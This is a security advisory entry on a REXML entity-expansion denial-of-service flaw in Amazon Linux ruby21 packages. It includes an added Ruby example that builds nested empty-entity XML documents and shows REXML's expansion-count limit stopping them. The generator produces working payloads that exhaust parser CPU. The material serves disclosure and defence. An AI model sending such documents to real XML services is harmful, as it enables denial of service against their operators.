ALAS-2014-449 ---- ruby21 rubygem21 rubygems21
ID: oval:org.secpod.oval:def:1600096 | Date: (C)2016-01-19 (M)2024-02-19
Class: PATCH | Family: unix
The upstream patch for CVE-2014-8080 introduced checks against REXML::Document.entity_expansion_text_limit, which bounds the size of the expanded text, but did not add checks against REXML::Document.entity_expansion_limit, which bounds the number of entity expansions performed. As a consequence, even with that patch applied, a small XML document could still cause REXML to consume an excessive amount of CPU time: nested references to an entity that expands to an empty string keep the expanded text at zero bytes, so the text-size check never fires, while the number of expansions grows exponentially with the nesting depth. Larger inputs additionally drive memory use up.
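To make the gap concrete, the following is an added Ruby example (not code from the advisory, SecPod or the REXML project). It constructs a document of the shape described above, where the innermost entity is empty, and shows that only the expansion-count limit stops it. It assumes a Ruby with the bundled rexml gem; the helper names nested_empty_entity_doc, expansion_count and expand_with_limit are this example's own, and the sample XML is constructed here.

```ruby
require 'rexml/document'

# Constructed sample input (not from the advisory): a chain of entities whose
# innermost member expands to the empty string. Every &eN; reference costs one
# expansion but contributes zero bytes of text, so a size check on the expanded
# text never trips while the work grows as fanout**depth.
def nested_empty_entity_doc(depth, fanout)
  lines = ['<?xml version="1.0"?>', '<!DOCTYPE member [', '  <!ENTITY e0 "">']
  (1..depth).each do |i|
    refs = "&e#{i - 1};" * fanout
    lines << "  <!ENTITY e#{i} \"#{refs}\">"
  end
  lines << ']>' << "<member>&e#{depth};</member>"
  lines.join("\n")
end

# Number of entity expansions needed to resolve a single &e<depth>; reference:
# 1 + fanout + fanout**2 + ... + fanout**depth.
def expansion_count(depth, fanout)
  (0..depth).sum { |i| fanout**i }
end

# Parse +xml+ and force expansion of the root element's text with
# REXML::Document.entity_expansion_limit set to +limit+ (the accessor named in
# the advisory; current REXML forwards it to REXML::Security). Returns
# [:ok, text, expansions_performed] or [:aborted, message]; the limit is
# restored afterwards so the process-wide setting is not left changed.
def expand_with_limit(xml, limit)
  saved = REXML::Document.entity_expansion_limit
  REXML::Document.entity_expansion_limit = limit
  begin
    doc = REXML::Document.new(xml)
    # REXML expands entities lazily: the chain is walked when the text value
    # is requested, and that is where the expansion-count check raises.
    text = doc.root.text.to_s
    count = doc.respond_to?(:entity_expansion_count) ? doc.entity_expansion_count : nil
    [:ok, text, count]
  rescue RuntimeError => e # REXML::ParseException is a RuntimeError too
    [:aborted, e.message]
  ensure
    REXML::Document.entity_expansion_limit = saved
  end
end

if $PROGRAM_NAME == __FILE__
  small = nested_empty_entity_doc(3, 10) # 1111 expansions, 0 bytes of text
  big   = nested_empty_entity_doc(6, 10) # 1_111_111 expansions, 0 bytes of text
  p expand_with_limit(small, 10_000)     # accepted: under REXML's shipped default cap
  p expand_with_limit(small, 1_000)      # aborted: "number of entity expansions exceeded, processing aborted."
  p expand_with_limit(big, 10_000)       # aborted by the count limit; the text limit alone would never fire
end
```

The depth-3 document expands 1111 times yet yields an empty string, so a check on expanded text size sees nothing wrong; the depth-6 document of the same shape performs over a million expansions, which only the expansion-count limit catches (REXML aborts with a RuntimeError once the count passes the cap). Applications that parse untrusted XML can lower the limit below the default for their own inputs; on current REXML the setting lives in REXML::Security.entity_expansion_limit, with the REXML::Document accessor kept as a forwarding alias.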
Platform: Amazon Linux AMI
Product: ruby21, rubygem21, rubygems21